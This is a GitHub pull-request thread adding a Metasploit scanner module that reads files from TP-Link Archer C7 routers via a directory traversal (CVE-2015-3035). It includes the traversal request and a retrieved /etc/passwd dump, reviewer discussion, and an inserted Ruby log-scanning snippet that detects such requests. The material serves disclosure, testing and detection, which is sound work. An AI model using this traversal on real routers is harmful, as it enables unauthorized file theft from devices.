
Archer c7 traversal #18003

Merged
merged 8 commits into from Jun 1, 2023

Conversation

@rad10 (Contributor) commented May 17, 2023

Vulnerable Application

This module attempts to spider files from an Archer C7 router using a known traversal vulnerability.

Verification Steps

  1. use auxiliary/scanner/http/archer_c7_traversal
  2. set RHOSTS <addr>
  3. set FILE <file>
  4. run

Scenarios

Archer C7

msf6 > use auxiliary/scanner/http/archer_c7_traversal
msf6 auxiliary(scanner/http/archer_c7_traversal) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf6 auxiliary(scanner/http/archer_c7_traversal) > run
[*] Grabbing data at /login/../../../etc/passwd
[+] /etc/passwd retrieved
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux Usermmm:/root:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
root:x:0:0:root:/root:/bin/sh
admin:x:500:500:admin:/tmp/dropbear:/bin/sh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
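The request the module sends (`/login/../../../etc/passwd`) is exactly what a defender wants to spot in router or web-server access logs. The following is an added example, not part of the pull request or the Metasploit module: it classifies request paths by whether their `..` segments escape the web root, handles percent-encoded variants, and runs over a constructed common-log-format sample.

```ruby
# Added example, not part of the pull request or the Metasploit module:
# flag access-log requests whose path uses dot-dot traversal, like the
# /login/../../../etc/passwd request the module sends. Input is constructed.

# Percent-decode a path twice so double-encoded "%252e" is unwrapped too;
# works on bytes so unusual encodings cannot raise.
def decode_path(raw_path)
  decoded = raw_path.b
  2.times { decoded = decoded.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr } }
  decoded
end

# :escape - ".." climbs above the web root (the PR's request does this)
# :dotdot - ".." present but stays under the root (browsers normalise these
#           away before sending, so seeing one server-side is still unusual)
# nil     - no traversal segments
def classify_path(raw_path)
  depth = 0
  seen_dotdot = false
  decode_path(raw_path).split(%r{[\\/]+}).each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      seen_dotdot = true
      depth -= 1
      return :escape if depth < 0
    else
      depth += 1
    end
  end
  seen_dotdot ? :dotdot : nil
end

# Common log format: client, request line, status. Returns
# [client, path, verdict] for each request carrying a traversal sequence.
LOG_LINE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/
def flag_traversals(log_text)
  log_text.each_line.filter_map do |line|
    m = LOG_LINE.match(line) or next
    verdict = classify_path(m[2]) or next
    [m[1], m[2], verdict]
  end
end

# Constructed sample: a benign request, the PR's request, and an encoded variant.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [17/May/2023:08:08:00 +0000] "GET /login/index.html HTTP/1.1" 200 1024
  10.0.0.9 - - [17/May/2023:08:08:01 +0000] "GET /login/../../../etc/passwd HTTP/1.1" 200 793
  10.0.0.9 - - [17/May/2023:08:08:02 +0000] "GET /login/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 793
LOG
flag_traversals(SAMPLE_LOG).each { |c, p, v| puts "#{v}\t#{c}\t#{p}" }
```

A 200 status on an `:escape` verdict, as in the sample, is the strongest signal: the device served the file rather than rejecting the path.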

rad10 and others added 2 commits May 17, 2023 08:08
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: bcoles <bcoles@gmail.com>
@space-r7 space-r7 added the needs-linting The module needs additional work to pass our automated linting rules label May 17, 2023
@github-actions commented:

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@rad10 rad10 requested a review from bcoles May 17, 2023 17:07
@@ -0,0 +1,44 @@
## Vulnerable Application

This module attempts to spider files from an archer c7 router using a known traversal vulnerability
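Review bot: the description in this hunk names neither the affected firmware nor the vulnerability identifier, and "spider files" overstates what the verification steps show (one `FILE` is retrieved per run). The tested firmware (C7_V1_141204_US) and the identifier (CVE-2015-3035) both appear later in this thread, so state them here, for example: `This module retrieves a file from a TP-Link Archer C7 router via a directory traversal vulnerability (CVE-2015-3035); tested against firmware C7_V1_141204_US.`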
Contributor:

Is there a firmware version?

Contributor Author (rad10):

After scouring and searching my old data, I found the version and firmware tested on: C7_V1_141204_US

# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
Contributor:

Since this gets the file, perhaps it would make more sense as a gather module?

Contributor Author (rad10):

I had no idea there was even a gather section until now. I was mostly modeling off of other traversal modules and scanners like dirb. I'm not sure if it belongs with them or in the gather bucket since it can easily go either way.

Contributor:

I second @bwatters-r7 on this. Scanner modules are usually used to find and report on a vulnerability, not to exploit it. I understand many scanner modules in Metasploit do not follow this rule, but this is the direction we would like to take. If a module gathers information by exploiting a vulnerability, a gather module is the best option. This kind of module can have check and exploit methods. The former can be used as a simple scanner to check if the host is vulnerable and the latter actually exploits the vulnerability to gather the data.

Note that the RHOSTS option is very flexible and can be used to run both methods against multiple targets without the need for a scanner module. You can, for example, use CIDR syntax or get the list of targets from a local file using the file:// prefix.

Contributor:

So, after reading the next comment, I realize you might not have the actual device to test. This will be a problem if you radically change the module structure, like I suggested just above. With that in mind, it might be better to keep the scanner module implementation as it is right now, or we won't be able to accept it. I suppose this has been thoroughly tested when you had access to the router. That said, if you have HTTP traces and/or a PCAP you recorded at the time, that would be helpful for us.

Contributor Author (@rad10, May 31, 2023):

I do actually. I have a pcap of the exploit taken ahead of time:
archerc7traversal.pcapng.gz

I also have been attempting to gain access to the router that I used, but I'm unsure if it's bricked or not. If I am to test it, it would be a while.

]
)
end

Contributor:

It would be nice to have a check method; it does not need to be major, but something to verify we're talking to a router that looks to be the right version/model.

Contributor Author (rad10):

So... this module was developed last fall for a grad project. The router I was testing with was being loaned for the semester, and I cannot find the firmware description to save my life. So I won't be able to add a check or a version finder even if I wanted to. The check in this case is whether it produces a file or a 404, sadly.

@gwillcox-r7 gwillcox-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label May 30, 2023
@cdelafuente-r7 cdelafuente-r7 self-assigned this May 31, 2023
@jmartin-tech jmartin-tech mentioned this pull request Jun 1, 2023
@cdelafuente-r7 (Contributor) commented:

Thanks @rad10 for your contribution. I reviewed the PCAP and everything looks good to me. I'll go ahead and land it.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 1, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 8ed981e into rapid7:master Jun 1, 2023
31 checks passed
@cdelafuente-r7 (Contributor) commented:

Release Notes

This adds a scanner module that gathers a specific file by leveraging a directory traversal vulnerability in TP-LINK Archer C7 routers. This vulnerability is identified as CVE-2015-3035.

@rad10 rad10 deleted the archer_c7_traversal branch June 1, 2023 16:31
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)